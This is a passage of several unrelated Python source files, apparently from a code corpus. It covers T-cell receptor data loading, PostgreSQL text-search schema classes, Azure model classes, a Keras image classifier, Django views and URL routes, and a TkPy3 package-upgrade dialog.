list(set(norm_prefixes.keys()).intersection(tumor_prefixes.keys()))
)
norm_fnames = [
os.path.join(dirname, norm_prefixes[p] + ".tsv.gz") for p in shared_prefixes
]
tumor_fnames = [
os.path.join(dirname, tumor_prefixes[p] + ".tsv.gz") for p in shared_prefixes
]
assert len(norm_fnames) == len(tumor_fnames)
# Load in the data
pool = multiprocessing.Pool(multiprocessing.cpu_count())
pfunc_norm = functools.partial(
_load_reuben_df_with_label_col, label_col="normal_adj_tissue"
)
pfunc_tumor = functools.partial(_load_reuben_df_with_label_col, label_col="tumor")
normal_dfs = pool.map(pfunc_norm, norm_fnames)
tumor_dfs = pool.map(pfunc_tumor, tumor_fnames)
pool.close()
pool.join()
combo_df = pd.concat(normal_dfs + tumor_dfs)
return combo_df
def load_chiou_nsclc_yeast_screen(
dirname: str = os.path.join(LOCAL_DATA_DIR, "chiou_nsclc_yeast_screen")
) -> pd.DataFrame:
"""
Paper performs:
1) Take patient TCR data, find specificity groups (returned here)
2) Take specificity groups, focus on motif S%DGMNTE
3) Use a yeast screen to identify antigens binding to group
4) Validate that antigen and its cross-reactivity patterns
https://www.ncbi.nlm.nih.gov/pmc/articles/PMC7960510/#mmc1
Paper focuses on motif: S%DGMNTE
"""
# TODO investigate what our model predicts as similar to these sequences
# TODO potentially investigate whether our model's embedding can capture similar groups
assert os.path.isdir(dirname)
spec_groups_df = pd.read_csv(
os.path.join(dirname, "nsclc_share_specificity_groups.txt"), sep="\t"
)
return spec_groups_df
def load_aa_properties(
fname: str = os.path.join(LOCAL_DATA_DIR, "aa_properties.csv")
) -> pd.DataFrame:
"""Load aa properties"""
df = pd.read_csv(fname, index_col=0, header=0)
assert all([x == y for x, y in zip(df.index, ft.AMINO_ACIDS)])
return df
def chunkify(x: Sequence[Any], chunk_size: int = 128):
"""
Split list into chunks of given size
>>> chunkify([1, 2, 3, 4, 5, 6, 7], 3)
[[1, 2, 3], [4, 5, 6], [7]]
>>> chunkify([(1, 10), (2, 20), (3, 30), (4, 40)], 2)
[[(1, 10), (2, 20)], [(3, 30), (4, 40)]]
"""
retval = [x[i : i + chunk_size] for i in range(0, len(x), chunk_size)]
return retval
def chunkify_dict(
x: Dict[str, Sequence[Any]], chunk_size: int = 128
) -> List[Dict[str, Sequence[Any]]]:
"""
Apply chunkify to each item in the dictionary
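    Each returned dict holds one chunk per key (illustrative example):
    >>> chunkify_dict({"a": [1, 2, 3], "b": [4, 5, 6]}, 2)
    [{'a': [1, 2], 'b': [4, 5]}, {'a': [3], 'b': [6]}]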
"""
# Dict of chunkified lists
chunkified = {k: chunkify(v, chunk_size) for k, v in x.items()}
# List of chunkfiied dicts
retval = []
for i in range(len(chunkified[list(chunkified.keys())[0]])):
chunk = {k: chunkified[k][i] for k in x.keys()}
assert len(set([len(v) for v in chunk.values()])) == 1
retval.append(chunk)
return retval
def min_dist_train_test_pairs(
train_pairs: List[Tuple[str, str]], test_pairs: List[Tuple[str, str]]
) -> np.ndarray:
"""
For each training pair, find the minimum edit distance to any test pair
summed across the two elements in the pair
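    Illustrative example (the distances for the two chain elements are summed):
    >>> min_dist_train_test_pairs([("AAA", "BBB")], [("AAB", "BBB")])
    array([1])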
"""
retval = []
test_x, test_y = zip(*test_pairs)
for x, y in train_pairs:
x_dists = np.array([Levenshtein.distance(x, item) for item in test_x])
y_dists = np.array([Levenshtein.distance(y, item) for item in test_y])
d = np.min(x_dists + y_dists)
retval.append(d)
return np.array(retval)
def min_dist_train_test_seqs(
train_seqs: Sequence[str], test_seqs: Collection[str]
) -> np.ndarray:
"""
    For each training sequence, find the minimum edit distance
    to any test sequence.
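    Illustrative example:
    >>> min_dist_train_test_seqs(["CASSLG", "CASSDF"], ["CASSLG"])
    array([0, 2])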
"""
retval = []
for seq in train_seqs:
# Calculate the edit distance to the most similar test sequence
d = min([Levenshtein.distance(seq, test_seq) for test_seq in test_seqs])
retval.append(d)
return np.array(retval)
def sanitize_train_sequences(
train_seqs: Sequence[str],
train_labels: Sequence[str],
test_seqs: Collection[str],
min_edit_dist: int = 2,
) -> Tuple[List[str], List[str]]:
"""
Return the training seqs/labels that are at least a given edit distance from
any test sequence
"""
assert len(train_seqs) == len(train_labels)
train_dist = min_dist_train_test_seqs(train_seqs, test_seqs)
passing_idx = np.where(train_dist >= min_edit_dist)[0]
logging.info(
f"Passing >= {min_edit_dist} edit dist cutoff: {len(passing_idx)}/{len(train_seqs)}"
)
return [train_seqs[i] for i in passing_idx], [train_labels[i] for i in passing_idx]
def write_lcmv_subsampled_benchmark_data():
"""Write the LCMV subsampled data for benchmarking runtime"""
tab = load_lcmv_table()
# Write out the table at varying sizes
tab_condensed = tab["TRB"]
for s in [500, 1000, 1500, 2000, 2500, 5000, 10000]:
# Write GLIPH inputs
t = tab_condensed.iloc[:s]
t.to_csv(
os.path.join(
LOCAL_DATA_DIR, "lcmv_runtime_benchmark_files", f"lcmv_sub_{s}.tsv"
),
sep="\t",
index=False,
)
# Write TCRDist3 inputs
write_lcmv_tcrdist3_input(
fname=os.path.join(
LOCAL_DATA_DIR,
"lcmv_runtime_benchmark_files",
f"tcrdist3_beta_lcmv_sub_{s}.tsv",
),
dual_chain=False,
subset=s,
)
return
def write_lcmv_tcrdist_input(fname: str = "temp.tsv"):
"""
    Write the LCMV data in a format for TCRDist, which expects a tsv file with the columns:
id epitope subject a_nucseq b_nucseq a_quals b_quals
Output is written to fname
"""
lcmv = load_lcmv_table()
seqs, labels = dedup_lcmv_table(lcmv, return_mode="nt")
tra, trb = zip(*seqs)
df = pd.DataFrame(
{
"id": np.arange(len(seqs)),
"epitope": ["foo"] * len(seqs),
"subject": ["bar"] * len(seqs),
"a_nucseq": tra,
"b_nucseq": trb,
}
)
df.to_csv(fname, sep="\t", index=False)
def write_lcmv_tcrdist3_input(
fname: str = os.path.join(EXTERNAL_EVAL_DIR, "lcmv_test_tcrdist3.tsv"),
dual_chain: bool = True,
subset: Union[str, int] = "test",
) -> pd.DataFrame:
"""
Write the LCMV data in a format for TCRDist, which expects 3 columns per chain
cdr3_b_aa v_b_gene j_b_gene # example for b chain
v/j genes expect the *01 suffix
Important processing:
if a v/j gene has a "+" indicating its two or more genes, we take the last one
"""
def sanitize_vj(s: str) -> str:
if "+" in s:
s = s.split("+")[-1]
if not s.endswith("*01"):
s += "*01"
return s
lcmv = load_lcmv_table()
df, labels = dedup_lcmv_table(lcmv, return_mode="full")
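    # subset may be a split name (always resolved to the test split here) or an
    # integer count of rows (used when writing the runtime benchmark files)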
if isinstance(subset, str):
labels_sub = split_arr(labels, "test")
df_sub = split_arr(df, "test") # We only evaluate test set clustering
else:
labels_sub = labels[:subset]
df_sub = df.iloc[:subset]
if dual_chain:
retval = df_sub.loc[
:, ["TRA", "v_a_gene", "j_a_gene", "TRB", "v_b_gene", "j_b_gene"]
]
retval.columns = [
"cdr3_a_aa",
"v_a_gene",
"j_a_gene",
"cdr3_b_aa",
"v_b_gene",
"j_b_gene",
]
else:
# Single chain
retval = df_sub.loc[:, ["TRB", "v_b_gene", "j_b_gene"]]
retval.columns = ["cdr3_b_aa", "v_b_gene", "j_b_gene"]
for colname in ["v_a_gene", "j_a_gene", "v_b_gene", "j_b_gene"]:
if colname in retval.columns:
retval[colname] = [sanitize_vj(s) for s in retval[colname]]
# Attach the "truth" column
retval["gp33_binding"] = ["TetPos" in l or "TetMid" in l for l in labels_sub]
retval.to_csv(fname, sep="\t", index=False)
return retval
def on_the_fly():
"""On the fly testing"""
# table = load_longitudinal_covid_trbs()
# print(table)
# print(collections.Counter(table["patient"]).most_common())
# print(collections.Counter(table["celltype"]).most_common())
# df = load_clonotypes_csv_general(sys.argv[1])
# print(df)
# print(write_lcmv_tcrdist3_input())
write_lcmv_subsampled_benchmark_data()
if __name__ == "__main__":
import doctest
# doctest.testmod()
# main()
on_the_fly()
|
py | b40439b8720eb3a38e6009ffafb4b7be1a8ac1d2 | # -*- coding: utf-8 -*-
"""
pyrseas.dbobject.textsearch
~~~~~~~~~~~~~~~~~~~~~~~~~~~
This defines eight classes: TSConfiguration, TSDictionary,
TSParser and TSTemplate derived from DbSchemaObject, and
TSConfigurationDict, TSDictionaryDict, TSParserDict and
TSTemplateDict derived from DbObjectDict.
"""
from . import DbObjectDict, DbSchemaObject
from . import commentable, ownable, split_schema_obj
class TSConfiguration(DbSchemaObject):
"""A text search configuration definition"""
keylist = ["schema", "name"]
single_extern_file = True
catalog = "pg_ts_config"
def __init__(self, name, schema, description, owner, parser, oid=None):
"""Initialize the configuration
:param name: configuration name (from cfgname)
:param description: comment text (from obj_description())
:param schema: schema name (from cfgnamespace)
:param owner: owner name (from rolname via cfgowner)
:param parser: parser name (from prsname via cfgparser)
"""
super(TSConfiguration, self).__init__(name, schema, description)
self._init_own_privs(owner, [])
self.parser = parser
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT nc.nspname AS schema, cfgname AS name,
rolname AS owner, np.nspname || '.' || prsname AS parser,
obj_description(c.oid, 'pg_ts_config') AS description, c.oid
FROM pg_ts_config c JOIN pg_roles r ON (r.oid = cfgowner)
JOIN pg_ts_parser p ON (cfgparser = p.oid)
JOIN pg_namespace nc ON (cfgnamespace = nc.oid)
JOIN pg_namespace np ON (prsnamespace = np.oid)
WHERE nc.nspname != 'pg_catalog'
AND nc.nspname != 'information_schema'
ORDER BY nc.nspname, cfgname"""
@staticmethod
def from_map(name, schema, inobj):
"""Initialize a configuration instance from a YAML map
:param name: configuration name
        :param schema: schema owning the configuration
:param inobj: YAML map of the configuration
:return: configuration instance
"""
obj = TSConfiguration(
name,
schema.name,
inobj.pop("description", None),
inobj.pop("owner", None),
inobj.pop("parser", None),
)
obj.set_oldname(inobj)
return obj
@property
def objtype(self):
return "TEXT SEARCH CONFIGURATION"
def to_map(self, db, no_owner):
"""Convert a text search configuration to a YAML-suitable format
:return: dictionary
"""
dct = super(TSConfiguration, self).to_map(db, no_owner)
if "." in self.parser:
(sch, pars) = self.parser.split(".")
if sch == self.schema:
dct["parser"] = pars
return dct
@commentable
@ownable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the configuration
:return: SQL statements
"""
clauses = []
clauses.append("PARSER = %s" % self.parser)
return [
"CREATE TEXT SEARCH CONFIGURATION %s (\n %s)"
% (self.qualname(), ",\n ".join(clauses))
]
def get_implied_deps(self, db):
deps = super(TSConfiguration, self).get_implied_deps(db)
deps.add(db.tsparsers[split_schema_obj(self.parser, self.schema)])
return deps
class TSConfigurationDict(DbObjectDict):
"The collection of text search configurations in a database"
cls = TSConfiguration
def from_map(self, schema, inconfigs):
"""Initialize the dictionary of configs by examining the input map
:param schema: schema owning the configurations
:param inconfigs: input YAML map defining the configurations
"""
for key in inconfigs:
if not key.startswith("text search configuration "):
raise KeyError("Unrecognized object type: %s" % key)
tsc = key[26:]
inobj = inconfigs[key]
self[(schema.name, tsc)] = TSConfiguration.from_map(
tsc, schema, inobj
)
class TSDictionary(DbSchemaObject):
"""A text search dictionary definition"""
keylist = ["schema", "name"]
single_extern_file = True
catalog = "pg_ts_dict"
def __init__(
self, name, schema, description, owner, template, options, oid=None
):
"""Initialize the dictionary
:param name: dictionary name (from dictname)
:param schema: schema name (from dictnamespace)
:param description: comment text (from obj_description())
:param owner: owner name (from rolname via dictowner)
:param template: template name (from dicttemplate)
:param options: initialization option string (from dictinitoption)
"""
super(TSDictionary, self).__init__(name, schema, description)
self._init_own_privs(owner, [])
self.template = template
self.options = options
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT nspname AS schema, dictname AS name, rolname AS owner,
tmplname AS template, dictinitoption AS options,
obj_description(d.oid, 'pg_ts_dict') AS description, d.oid
FROM pg_ts_dict d JOIN pg_ts_template t ON (dicttemplate = t.oid)
JOIN pg_roles r ON (r.oid = dictowner)
JOIN pg_namespace n ON (dictnamespace = n.oid)
WHERE nspname != 'pg_catalog' AND nspname != 'information_schema'
ORDER BY nspname, dictname"""
@staticmethod
def from_map(name, schema, inobj):
"""Initialize a dictionary instance from a YAML map
:param name: dictionary name
        :param schema: schema owning the dictionary
:param inobj: YAML map of the dictionary
:return: dictionary instance
"""
obj = TSDictionary(
name,
schema.name,
inobj.pop("description", None),
inobj.pop("owner", None),
inobj.pop("template", None),
inobj.pop("options", None),
)
obj.set_oldname(inobj)
return obj
@property
def objtype(self):
return "TEXT SEARCH DICTIONARY"
@commentable
@ownable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the dictionary
:return: SQL statements
"""
clauses = []
clauses.append("TEMPLATE = %s" % self.template)
if self.options is not None:
clauses.append(self.options)
return [
"CREATE TEXT SEARCH DICTIONARY %s (\n %s)"
% (self.qualname(), ",\n ".join(clauses))
]
class TSDictionaryDict(DbObjectDict):
"The collection of text search dictionaries in a database"
cls = TSDictionary
def from_map(self, schema, indicts):
"""Initialize the dictionary of dictionaries by examining the input map
:param schema: schema owning the dictionaries
:param indicts: input YAML map defining the dictionaries
"""
for key in indicts:
if not key.startswith("text search dictionary "):
raise KeyError("Unrecognized object type: %s" % key)
tsd = key[23:]
inobj = indicts[key]
self[(schema.name, tsd)] = TSDictionary.from_map(tsd, schema, inobj)
class TSParser(DbSchemaObject):
"""A text search parser definition"""
keylist = ["schema", "name"]
single_extern_file = True
catalog = "pg_ts_parser"
def __init__(
self,
name,
schema,
description,
start,
gettoken,
end,
headline,
lextypes,
oid=None,
):
"""Initialize the parser
:param name: parser name (from prsname)
:param schema: schema name (from prsnamespace)
:param description: comment text (from obj_description())
:param start: startup function (from prsstart)
:param gettoken: next-token function (from prstoken)
:param end: shutdown function (from prsend)
:param headline: headline function (from prsheadline)
:param lextypes: lextype function (from prslextype)
"""
super(TSParser, self).__init__(name, schema, description)
self._init_own_privs(None, [])
self.start = start
self.gettoken = gettoken
self.end = end
self.headline = headline
self.lextypes = lextypes
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT nspname AS schema, prsname AS name,
prsstart::regproc AS start, prstoken::regproc AS gettoken,
prsend::regproc AS end, prslextype::regproc AS lextypes,
prsheadline::regproc AS headline,
obj_description(p.oid, 'pg_ts_parser') AS description, p.oid
FROM pg_ts_parser p JOIN pg_namespace n ON (prsnamespace = n.oid)
WHERE nspname != 'pg_catalog' AND nspname != 'information_schema'
ORDER BY nspname, prsname"""
@staticmethod
def from_map(name, schema, inobj):
"""Initialize a parser instance from a YAML map
:param name: parser name
        :param schema: schema owning the parser
:param inobj: YAML map of the parser
:return: parser instance
"""
obj = TSParser(
name,
schema.name,
inobj.pop("description", None),
inobj.pop("start", None),
inobj.pop("gettoken", None),
inobj.pop("end", None),
inobj.pop("headline", None),
inobj.pop("lextypes", None),
)
obj.set_oldname(inobj)
return obj
@property
def objtype(self):
return "TEXT SEARCH PARSER"
@commentable
@ownable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the parser
:return: SQL statements
"""
clauses = []
for attr in ["start", "gettoken", "end", "lextypes"]:
clauses.append("%s = %s" % (attr.upper(), getattr(self, attr)))
if self.headline is not None:
clauses.append("HEADLINE = %s" % self.headline)
return [
"CREATE TEXT SEARCH PARSER %s (\n %s)"
% (self.qualname(), ",\n ".join(clauses))
]
class TSParserDict(DbObjectDict):
"The collection of text search parsers in a database"
cls = TSParser
def from_map(self, schema, inparsers):
"""Initialize the dictionary of parsers by examining the input map
:param schema: schema owning the parsers
:param inparsers: input YAML map defining the parsers
"""
for key in inparsers:
if not key.startswith("text search parser "):
raise KeyError("Unrecognized object type: %s" % key)
tsp = key[19:]
inobj = inparsers[key]
self[(schema.name, tsp)] = TSParser.from_map(tsp, schema, inobj)
class TSTemplate(DbSchemaObject):
"""A text search template definition"""
keylist = ["schema", "name"]
single_extern_file = True
catalog = "pg_ts_template"
def __init__(self, name, schema, description, init, lexize, oid=None):
"""Initialize the template
:param name: template name (from tmplname)
:param schema: schema name (from tmplnamespace)
:param description: comment text (from obj_description())
:param init: initialization function (from tmplinit)
:param lexize: lexize function (from tmpllexize)
"""
super(TSTemplate, self).__init__(name, schema, description)
self._init_own_privs(None, [])
self.init = init
self.lexize = lexize
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT nspname AS schema, tmplname AS name, p.oid,
tmplinit::regproc AS init, tmpllexize::regproc AS lexize,
obj_description(p.oid, 'pg_ts_template') AS description
FROM pg_ts_template p
JOIN pg_namespace n ON (tmplnamespace = n.oid)
WHERE nspname != 'pg_catalog' AND nspname != 'information_schema'
ORDER BY nspname, tmplname"""
@staticmethod
def from_map(name, schema, inobj):
"""Initialize a template instance from a YAML map
:param name: template name
        :param schema: schema owning the template
:param inobj: YAML map of the template
:return: template instance
"""
obj = TSTemplate(
name,
schema.name,
inobj.pop("description", None),
inobj.pop("init", None),
inobj.pop("lexize", None),
)
obj.set_oldname(inobj)
return obj
@property
def objtype(self):
return "TEXT SEARCH TEMPLATE"
@commentable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the template
:return: SQL statements
"""
clauses = []
if self.init is not None:
clauses.append("INIT = %s" % self.init)
clauses.append("LEXIZE = %s" % self.lexize)
return [
"CREATE TEXT SEARCH TEMPLATE %s (\n %s)"
% (self.qualname(), ",\n ".join(clauses))
]
class TSTemplateDict(DbObjectDict):
"The collection of text search templates in a database"
cls = TSTemplate
def from_map(self, schema, intemplates):
"""Initialize the dictionary of templates by examining the input map
:param schema: schema owning the templates
:param intemplates: input YAML map defining the templates
"""
for key in intemplates:
if not key.startswith("text search template "):
raise KeyError("Unrecognized object type: %s" % key)
tst = key[21:]
inobj = intemplates[key]
self[(schema.name, tst)] = TSTemplate.from_map(tst, schema, inobj)
|
py | b40439c1a3693be38855c05889599c19c8b87371 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Optional
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Feline(msrest.serialization.Model):
"""Feline.
:param meows:
:type meows: bool
:param hisses:
:type hisses: bool
"""
_attribute_map = {
'meows': {'key': 'meows', 'type': 'bool'},
'hisses': {'key': 'hisses', 'type': 'bool'},
}
def __init__(
self,
*,
meows: Optional[bool] = None,
hisses: Optional[bool] = None,
**kwargs
):
super(Feline, self).__init__(**kwargs)
self.meows = meows
self.hisses = hisses
class Pet(msrest.serialization.Model):
"""Pet.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
name: str,
**kwargs
):
super(Pet, self).__init__(**kwargs)
self.name = name
class Cat(Pet, Feline):
"""Cat.
All required parameters must be populated in order to send to Azure.
:param meows:
:type meows: bool
:param hisses:
:type hisses: bool
:param name: Required.
:type name: str
:param likes_milk:
:type likes_milk: bool
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'meows': {'key': 'meows', 'type': 'bool'},
'hisses': {'key': 'hisses', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'likes_milk': {'key': 'likesMilk', 'type': 'bool'},
}
def __init__(
self,
*,
name: str,
meows: Optional[bool] = None,
hisses: Optional[bool] = None,
likes_milk: Optional[bool] = None,
**kwargs
):
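        # Cooperative multiple inheritance: Pet.__init__ consumes "name" and forwards
        # "meows"/"hisses" through **kwargs to Feline.__init__ along the MRO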
super(Cat, self).__init__(name=name, meows=meows, hisses=hisses, **kwargs)
self.meows = meows
self.hisses = hisses
self.likes_milk = likes_milk
self.name = name
class Error(msrest.serialization.Model):
"""Error.
:param status:
:type status: int
:param message:
:type message: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'int'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
*,
status: Optional[int] = None,
message: Optional[str] = None,
**kwargs
):
super(Error, self).__init__(**kwargs)
self.status = status
self.message = message
class Horse(Pet):
"""Horse.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
:param is_a_show_horse:
:type is_a_show_horse: bool
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'is_a_show_horse': {'key': 'isAShowHorse', 'type': 'bool'},
}
def __init__(
self,
*,
name: str,
is_a_show_horse: Optional[bool] = None,
**kwargs
):
super(Horse, self).__init__(name=name, **kwargs)
self.is_a_show_horse = is_a_show_horse
class Kitten(Cat):
"""Kitten.
All required parameters must be populated in order to send to Azure.
:param meows:
:type meows: bool
:param hisses:
:type hisses: bool
:param name: Required.
:type name: str
:param likes_milk:
:type likes_milk: bool
:param eats_mice_yet:
:type eats_mice_yet: bool
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'meows': {'key': 'meows', 'type': 'bool'},
'hisses': {'key': 'hisses', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'likes_milk': {'key': 'likesMilk', 'type': 'bool'},
'eats_mice_yet': {'key': 'eatsMiceYet', 'type': 'bool'},
}
def __init__(
self,
*,
name: str,
meows: Optional[bool] = None,
hisses: Optional[bool] = None,
likes_milk: Optional[bool] = None,
eats_mice_yet: Optional[bool] = None,
**kwargs
):
super(Kitten, self).__init__(meows=meows, hisses=hisses, name=name, likes_milk=likes_milk, **kwargs)
self.eats_mice_yet = eats_mice_yet
|
py | b4043a75ae60fa7e23fdb76db26e06f7183b6a59 | """通常の分類。"""
import keras
import keras.preprocessing.image
BATCH_SIZE = 16
def _main():
idg1 = keras.preprocessing.image.ImageDataGenerator(
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
rescale=1. / 255)
idg2 = keras.preprocessing.image.ImageDataGenerator(rescale=1. / 255)
gen1 = idg1.flow_from_directory('data/train_only', target_size=(224, 224), batch_size=BATCH_SIZE)
gen2 = idg2.flow_from_directory('data/test', target_size=(224, 224), batch_size=BATCH_SIZE, shuffle=False)
assert gen1.num_classes == gen2.num_classes
num_classes = gen1.num_classes
base_model = keras.applications.Xception(include_top=False)
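    # Freeze everything before the 'block14_sepconv1' layer for fine-tuning,
    # but leave BatchNormalization layers trainable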
for layer in base_model.layers:
if layer.name == 'block14_sepconv1':
break
elif not isinstance(layer, keras.layers.BatchNormalization):
layer.trainable = False
x = base_model.outputs[0]
x = keras.layers.GlobalAveragePooling2D()(x)
x = keras.layers.Dense(num_classes, activation='softmax', kernel_initializer='zeros')(x)
model = keras.models.Model(base_model.inputs, x)
model.summary()
model.compile(
loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.SGD(momentum=0.9, nesterov=True),
metrics=['acc'])
base_lr = 1e-1
main_epochs = 20
lr_list = [base_lr] * main_epochs + [base_lr / 10] * (main_epochs // 2) + [base_lr / 100] * (main_epochs // 2)
callbacks = []
callbacks.append(keras.callbacks.LearningRateScheduler(lambda ep: lr_list[ep]))
callbacks.append(keras.callbacks.CSVLogger('classification_history.tsv', separator='\t'))
model.fit_generator(
generator=gen1,
steps_per_epoch=gen1.samples // gen1.batch_size,
epochs=len(lr_list),
validation_data=gen2,
validation_steps=gen2.samples // gen2.batch_size,
callbacks=callbacks)
def _conv_bn_act(*args, **kwargs):
def _layer(x):
x = keras.layers.Conv2D(*args, **kwargs)(x)
x = keras.layers.BatchNormalization()(x)
x = keras.layers.Activation('relu')(x)
return x
return _layer
if __name__ == '__main__':
_main()
|
py | b4043bcf110bfaeb42dff781079384cb30da494f | import json
import time
from typing import Dict, Union
import redis
from django.conf import settings
from django.http import HttpResponse
if settings.REDIS_URL:
redis_instance = redis.from_url(settings.REDIS_URL, db=0)
else:
redis_instance = None
def health(request):
return HttpResponse("ok", content_type="text/plain")
def stats(request):
stats_response: Dict[str, Union[int, str]] = {}
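    # Age in seconds of the last worker heartbeat stored in Redis; report "offline"
    # if it is missing or older than 5 minutes.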
last_heartbeat = redis_instance.get("POSTHOG_HEARTBEAT") if redis_instance else None
worker_heartbeat = int(time.time()) - int(last_heartbeat) if last_heartbeat else None
    if worker_heartbeat is not None and worker_heartbeat < 300:
stats_response["worker_heartbeat"] = worker_heartbeat
else:
stats_response["worker_heartbeat"] = "offline"
return HttpResponse(json.dumps(stats_response), content_type="application/json")
|
py | b4043cbdc6594d807631689f5f0bf287bdebd49e | from django.conf.urls import url
from cba_examples.views import button
from cba_examples.views import checkbox
from cba_examples.views import drag_n_drop
from cba_examples.views import edit_text
from cba_examples.views import dnd_select
from cba_examples.views import file_input_1
from cba_examples.views import file_input_2
from cba_examples.views import file_input_3
from cba_examples.views import links
from cba_examples.views import list_1
from cba_examples.views import history
from cba_examples.views import history_2
from cba_examples.views import image
from cba_examples.views import overview
from cba_examples.views import radio
from cba_examples.views import select_1
from cba_examples.views import select_2
from cba_examples.views import select_3
from cba_examples.views import table_1
from cba_examples.views import table_2
from cba_examples.views import tabs_1
from cba_examples.views import textarea_1
from cba_examples.views import textarea_2
from cba_examples.views import text_input_1
from cba_examples.views import text_input_2
urlpatterns = [
url(r'^$', overview.OverviewView.as_view(), name='overview'),
url(r'^button$', button.ButtonView.as_view(), name='button'),
url(r'^checkboxes$', checkbox.CheckboxView.as_view(), name='checkboxes'),
url(r'^dnd-select$', dnd_select.View.as_view(), name='dnd_select'),
url(r'^drag-n-drop$', drag_n_drop.DragnDropView.as_view(), name='drag_n_drop'),
url(r'^edit-text$', edit_text.View.as_view(), name='edit_text'),
url(r'^links$', links.LinksView.as_view(), name='link'),
url(r'^list-1$', list_1.LinksView.as_view(), name='list_1'),
url(r'^file-input-1$', file_input_1.FileInputView.as_view(), name='file_input_1'),
url(r'^file-input-2$', file_input_2.FileInputView.as_view(), name='file_input_2'),
url(r'^file-input-3$', file_input_3.FileInputView.as_view(), name='file_input_3'),
url(r'^history$', history.HistoryView.as_view(), name='history'),
url(r'^history-2$', history_2.View.as_view(), name='history_2'),
url(r'^image$', image.ImageView.as_view(), name='image'),
url(r'^radio$', radio.RadioCheckboxView.as_view(), name='radio'),
url(r'^select-1$', select_1.SelectView.as_view(), name='select_1'),
url(r'^select-2$', select_2.SelectView.as_view(), name='select_2'),
url(r'^select-3$', select_3.SelectView.as_view(), name='select_3'),
url(r'^table-1$', table_1.TableView.as_view(), name='table_1'),
url(r'^table-2$', table_2.TableView.as_view(), name='table_2'),
url(r'^tabs-1$', tabs_1.TabsView.as_view(), name='tabs_1'),
url(r'^textarea-1$', textarea_1.TextAreaView.as_view(), name='textarea_1'),
url(r'^textarea-2$', textarea_2.TextAreaView.as_view(), name='textarea_2'),
url(r'^text-input-1$', text_input_1.TextInputView.as_view(), name='text_input_1'),
url(r'^text-input-2$', text_input_2.TextInputView.as_view(), name='text_input_2'),
]
|
py | b4043d4576b6338884023e770784ad2acc508362 | class ConfigParameters:
"""
Configuration settings names
"""
TABPY_PORT = "TABPY_PORT"
TABPY_QUERY_OBJECT_PATH = "TABPY_QUERY_OBJECT_PATH"
TABPY_STATE_PATH = "TABPY_STATE_PATH"
TABPY_TRANSFER_PROTOCOL = "TABPY_TRANSFER_PROTOCOL"
TABPY_CERTIFICATE_FILE = "TABPY_CERTIFICATE_FILE"
TABPY_KEY_FILE = "TABPY_KEY_FILE"
TABPY_PWD_FILE = "TABPY_PWD_FILE"
TABPY_LOG_DETAILS = "TABPY_LOG_DETAILS"
TABPY_STATIC_PATH = "TABPY_STATIC_PATH"
TABPY_MAX_REQUEST_SIZE_MB = "TABPY_MAX_REQUEST_SIZE_MB"
TABPY_EVALUATE_TIMEOUT = "TABPY_EVALUATE_TIMEOUT"
TABPY_COOKIE = "TABPY_COOKIE"
|
py | b4043ea59ae540a75ac3246dea8cd317733a63e8 | import os
from shutil import copy, move
def copyfiles(src, dst, exclude=[]):
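    # Recursively copy src into dst, skipping files whose extension is listed in
    # exclude; the directory structure is recreated either way.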
for root, dirs, files in os.walk(src):
dst_root = os.path.relpath(root, start=src)
for file in files:
extension = file.split('.')[-1]
if extension not in exclude:
os.makedirs(os.path.join(dst, dst_root), exist_ok=True)
copy(os.path.join(root, file), os.path.join(dst, dst_root, file))
for d in dirs:
os.makedirs(os.path.join(dst, dst_root, d), exist_ok=True)
def movefiles(src, dst, exclude=[]):
for root, dirs, files in os.walk(src):
dst_root = os.path.relpath(root, start=src)
for file in files:
extension = file.split('.')[-1]
if extension not in exclude:
os.makedirs(os.path.join(dst, dst_root), exist_ok=True)
move(os.path.join(root, file), os.path.join(dst, dst_root, file))
for d in dirs:
os.makedirs(os.path.join(dst, dst_root, d), exist_ok=True) |
py | b4043f1abce4bfac128803e1aa391ebd2a688905 | # -*- coding: UTF-8 -*-
import sys
import os
import qdarkstyle
from PyQt5 import QtGui
from PyQt5.QtCore import QThread, pyqtSignal, Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QDialog, QVBoxLayout, QLabel, QListWidget, QListWidgetItem, QWidget, QHBoxLayout, \
QPushButton, QMessageBox, QTextBrowser, QAction, QApplication
from TkPy3.tkpy3_tools.start import tkpy3_setup
from TkPy3.version import version as tkpy_version
from TkPy3.tkpy3_tools.pip_tools import tkpy_pip
from TkPy3.locale_dirs import images_icon_dir, static_dir
from TkPy3.tkpy3_tools.qt_load import LoadWidget
class InstallThread(QThread):
done = pyqtSignal()
ok = pyqtSignal(str)
package_name = pyqtSignal(str)
falsed = pyqtSignal(str)
def __init__(self, parent=None, *packages):
QThread.__init__(self, parent)
self.packages = packages
def run(self):
pip = tkpy_pip()
for i in self.packages:
self.package_name.emit(i)
if pip.upgrade(i):
self.falsed.emit(i)
else:
self.ok.emit(i)
self.done.emit()
class RelyDialog(QDialog):
def __init__(self):
QDialog.__init__(self)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.resize(800, 400)
